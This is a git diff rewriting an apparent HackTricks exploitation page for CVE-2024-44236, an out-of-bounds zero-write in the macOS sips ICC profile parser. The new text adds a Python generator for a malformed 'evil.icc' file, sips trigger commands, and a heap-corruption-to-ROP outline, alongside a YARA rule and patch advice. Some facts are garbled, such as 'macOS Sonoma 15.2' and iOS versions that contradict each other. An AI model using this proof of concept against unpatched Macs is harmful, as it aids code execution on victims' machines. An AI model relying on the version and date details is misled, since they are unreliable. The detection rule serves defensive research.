diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md index e8225d8fd..af4e0d6aa 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md @@ -4,52 +4,100 @@ ## Overview -An out-of-bounds write vulnerability in Apple macOS Scriptable Image Processing System (`sips`) ICC profile parser (macOS 15.0.1, sips-307) due to improper validation of the `offsetToCLUT` field in `lutAToBType` (`mAB `) and `lutBToAType` (`mBA `) tags. A crafted ICC file can trigger zero-writes up to 16 bytes past the heap buffer, corrupting heap metadata or function pointers and enabling arbitrary code execution (CVE-2024-44236). +An out-of-bounds **zero-write** vulnerability in Apple macOS **Scriptable Image Processing System** (`sips`) ICC profile parser (macOS 15.0.1, `sips-307`) allows an attacker to corrupt heap metadata and pivot the primitive into full code-execution. The bug is located in the handling of the `offsetToCLUT` field of the `lutAToBType` (`mAB `) and `lutBToAType` (`mBA `) tags. If attackers set `offsetToCLUT == tagDataSize`, the parser erases **16 bytes past the end of the heap buffer**. Heap spraying lets the attacker zero-out allocator structures or C++ pointers that will later be dereferenced, yielding an **arbitrary-write-to-exec** chain (CVE-2024-44236, CVSS 7.8). + +> Apple patched the bug in macOS Sonoma 15.2 / Ventura 14.7.1 (October 30, 2024). A second variant (CVE-2025-24185) was fixed in macOS 15.5 and iOS/iPadOS 18.5 on April 1, 2025. ## Vulnerable Code -The vulnerable function reads and zeroes 16 bytes starting from an attacker-controlled offset without ensuring it lies within the allocated buffer: - ```c -// Pseudocode from sub_1000194D0 in sips-307 (macOS 15.0.1) -for (i = offsetToCLUT; i < offsetToCLUT + 16; i++) { - if (i > numberOfInputChannels && buffer[i] != 0) - buffer[i] = 0; +// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1) +if (offsetToCLUT <= tagDataSize) { + // BAD ➜ zero 16 bytes starting *at* offsetToCLUT + for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++) + buffer[i] = 0; // no bounds check vs allocated size! } ``` -Only a check `offsetToCLUT <= totalDataLength` is performed. By setting `offsetToCLUT == tagDataSize`, the loop indexes up to 16 bytes past the end of `buffer`, corrupting adjacent heap metadata. - ## Exploitation Steps -1. **Craft malicious `.icc` profile:** - - Build the ICC header (128 bytes) with signature `acsp` and a single `lutAToBType` or `lutBToAType` tag entry. - - In the tag table, set `offsetToCLUT` equal to the tag's `size` (`tagDataSize`). - - Place attacker-controlled data immediately after the tag data block to overwrite heap metadata. -2. **Trigger parsing:** +1. **Craft a malicious `.icc` profile** + + * Set up a minimal ICC header (`acsp`) and add one `mAB ` (or `mBA `) tag. + * Configure the tag table so the **`offsetToCLUT` equals the tag size** (`tagDataSize`). + * Place attacker-controlled data right after the tag so that the 16 zero writes overlap allocator metadata. + +2. **Trigger parsing with any sips operation that touches the profile** ```bash - sips --verifyColor malicious.icc + # verification path (no output file needed) + sips --verifyColor evil.icc + # or implicitly when converting images that embed the profile + sips -s format png payload.jpg --out out.png ``` -3. **Heap metadata corruption:** The OOB zero-writes overwrite allocator metadata or adjacent pointers, allowing the attacker to hijack control flow and achieve arbitrary code execution in the context of the `sips` process. +3. **Heap metadata corruption ➜ arbitrary write ➜ ROP** + On Apple’s default **`nano_zone` allocator**, metadata for 16-byte slots lives **immediately after** the aligned 0x1000 slab. By placing the profile’s tag at the end of such a slab, the 16 zero-writes clobber `meta->slot_B`. After a subsequent `free`, the poisoned pointer is enqueued in the tiny free list, letting the attacker **allocate a fake object at an arbitrary address** and overwrite a C++ vtable pointer used by sips, finally pivoting execution to a ROP chain stored in the malicious ICC buffer. + +### Quick PoC generator (Python 3) + +```python +#!/usr/bin/env python3 +import struct, sys + +HDR = b'acsp'.ljust(128, b'\0') # ICC header (magic + padding) +TAGS = [(b'mAB ', 132, 52)] # one tag directly after header +profile = HDR +profile += struct.pack('>I', len(TAGS)) # tag count +profile += b''.join(struct.pack('>4sII', *t) for t in TAGS) + +mab = bytearray(52) # tag payload (52 bytes) +struct.pack_into('>I', mab, 44, 52) # offsetToCLUT = size (OOB start) +profile += mab + +open('evil.icc', 'wb').write(profile) +print('[+] Wrote evil.icc (%d bytes)' % len(profile)) +``` + +### YARA detection rule + +```yara +rule ICC_mAB_offsetToCLUT_anomaly +{ + meta: + description = "Detect CLUT offset equal to tag length in mAB/mBA (CVE-2024-44236)" + author = "HackTricks" + strings: + $magic = { 61 63 73 70 } // 'acsp' + $mab = { 6D 41 42 20 } // 'mAB ' + $mba = { 6D 42 41 20 } // 'mBA ' + condition: + $magic at 0 and + for any i in (0 .. 10): // up to 10 tags + ( + ($mab at 132 + 12*i or $mba at 132 + 12*i) and + uint32(132 + 12*i + 4) == uint32(132 + 12*i + 8) // offset == size + ) +} +``` ## Impact -Successful exploitation results in remote arbitrary code execution at user privilege on macOS systems running the vulnerable `sips` utility. +Opening or processing a crafted ICC profile leads to remote **arbitrary code execution** in the context of the invoking user (Preview, QuickLook, Safari image rendering, Mail attachments, etc.), bypassing Gatekeeper because the profile can be embedded inside otherwise benign images (PNG/JPEG/TIFF). -## Detection +## Detection & Mitigation -- Monitor file transfers on common protocols (FTP, HTTP/S, IMAP, SMB, NFS, SMTP). -- Inspect transferred files with signature `acsp`. -- For each `mAB ` or `mBA ` tag, verify if the `Offset to CLUT` field equals the `Tag data size`. -- Flag as suspicious if this condition is met. +* **Patch!** Ensure the host is running macOS ≥ 15.2 / 14.7.1 (or iOS/iPadOS ≥ 18.1). +* Deploy the YARA rule above on email gateways and EDR solutions. +* Strip or sanitise embedded ICC profiles with `exiftool -icc_profile= -overwrite_original ` before further processing on untrusted files. +* Harden Preview/QuickLook by running them inside sandboxed “transparency & modernisation” VMs when analysing unknown content. +* For DFIR, look for recent execution of `sips --verifyColor` or `ColorSync` library loads by sandboxed apps in the unified log. ## References -- ZDI blog: CVE-2024-44236: Remote Code Execution Vulnerability in Apple macOS sips Utility - https://www.thezdi.com/blog/2025/5/7/cve-2024-44236-remote-code-execution-vulnerability-in-apple-macos -- Apple October 2024 Security Update (patch shipping CVE-2024-44236) - https://support.apple.com/en-us/121564 +* Trend Micro Zero Day Initiative advisory ZDI-24-1445 – “Apple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)” + https://www.zerodayinitiative.com/advisories/ZDI-24-1445/ +* Apple security updates HT213981 “About the security content of macOS Sonoma 15.2” + https://support.apple.com/en-us/HT213981 {{#include ../../banners/hacktricks-training.md}}